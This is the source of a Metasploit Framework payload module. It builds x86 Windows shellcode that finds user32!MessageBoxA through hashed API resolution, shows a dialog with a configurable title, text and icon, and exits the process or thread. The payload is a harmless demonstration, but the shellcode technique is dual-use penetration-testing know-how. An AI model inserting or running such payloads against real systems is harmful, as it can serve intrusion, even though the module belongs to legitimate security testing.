GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/payloads/singles/windows/messagebox.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
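module MetasploitModule
  # Size in bytes of the payload generated with the default datastore values.
  # The byte-list encoding of TITLE/TEXT below emits exactly the same bytes as
  # the former quoted-string form, so this value is unaffected.
  CachedSize = 231

  include Msf::Payload::Windows
  include Msf::Payload::Single
  include Msf::Payload::Windows::BlockApi

  # MessageBoxA uType icon flag selected by the ICON option. Any value not
  # listed here (including the default 'NO') falls back to 0x00 (no icon).
  ICON_STYLES = {
    'ERROR' => 0x10,
    'QUESTION' => 0x20,
    'WARNING' => 0x30,
    'INFORMATION' => 0x40
  }.freeze

  def initialize(info = {})
    super(
      merge_info(
        info,
        'Name' => 'Windows MessageBox',
        'Description' => 'Spawns a dialog via MessageBox using a customizable title, text & icon',
        'Author' => [
          'corelanc0d3r <peter.ve[at]corelan.be>', # original payload module
          'jduck' # some ruby factoring
        ],
        'License' => MSF_LICENSE,
        'Platform' => 'win',
        'Arch' => ARCH_X86
      )
    )

    # Register MessageBox options
    register_options(
      [
        OptString.new('TITLE', [ true, 'Messagebox Title (max 255 chars)', 'MessageBox' ], max_length: 255),
        OptString.new('TEXT', [ true, 'Messagebox Text (max 255 chars)', 'Hello, from MSF!' ], max_length: 255),
        OptString.new('ICON', [ true, 'Icon type can be NO, ERROR, INFORMATION, WARNING or QUESTION', 'NO' ])
      ]
    )
  end

  #
  # Construct the payload
  #
  # Builds x86 assembly that resolves user32!MessageBoxA through the block API
  # stub, calls it with the configured TITLE/TEXT/ICON, and then exits via
  # kernel32!ExitProcess or, when EXITFUNC is THREAD, via ExitThread
  # (RtlExitUserThread on Vista+). TITLE and TEXT are embedded as explicit byte
  # lists rather than quoted assembler strings, so a quote, backslash or
  # non-ASCII character in either option can neither break assembly nor alter
  # the surrounding assembly source.
  #
  def generate(_opts = {})
    style = ICON_STYLES.fetch(datastore['ICON'].upcase.strip, 0x00)

    exitfunc_asm = %(
      push 0
      push #{Rex::Text.block_api_hash('kernel32.dll', 'ExitProcess')}
      call ebp
    )
    if datastore['EXITFUNC'].upcase.strip == 'THREAD'
      exitfunc_asm = %(
        mov ebx, #{Rex::Text.block_api_hash('kernel32.dll', 'ExitThread')}
        push #{Rex::Text.block_api_hash('kernel32.dll', 'GetVersion')}
        call ebp
        add esp,0x28
        cmp al,0x6
        jl use_exitthread ; is older than Vista or Server 2003 R2?
        cmp bl,0xe0 ; check if GetVersion change the hash stored in EBX
        jne use_exitthread
        mov ebx, #{Rex::Text.block_api_hash('ntdll.dll', 'RtlExitUserThread')}
      use_exitthread:
        push 0
        push ebx
        call ebp
      )
    end

    payload_data = %(
      cld
      call start
      #{asm_block_api}
    start:
      pop ebp
      call get_user32
      db "user32.dll", 0x00
    get_user32:
      push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
      call ebp
      push #{style}
      call get_title
      db #{asm_cstring(datastore['TITLE'])}
    get_title:
      call get_text
      db #{asm_cstring(datastore['TEXT'])}
    get_text:
      push 0
      push #{Rex::Text.block_api_hash('user32.dll', 'MessageBoxA')}
      call ebp
      #{exitfunc_asm}
    )
    self.assembly = payload_data
    super
  end

  private

  # Render +str+ as a NUL-terminated, comma-separated list of hex byte
  # literals suitable for an assembler +db+ directive (e.g. "0x41, 0x00").
  # nil is treated as the empty string and yields just the terminator.
  def asm_cstring(str)
    (str.to_s.bytes + [0]).map { |byte| format('0x%02x', byte) }.join(', ')
  end
end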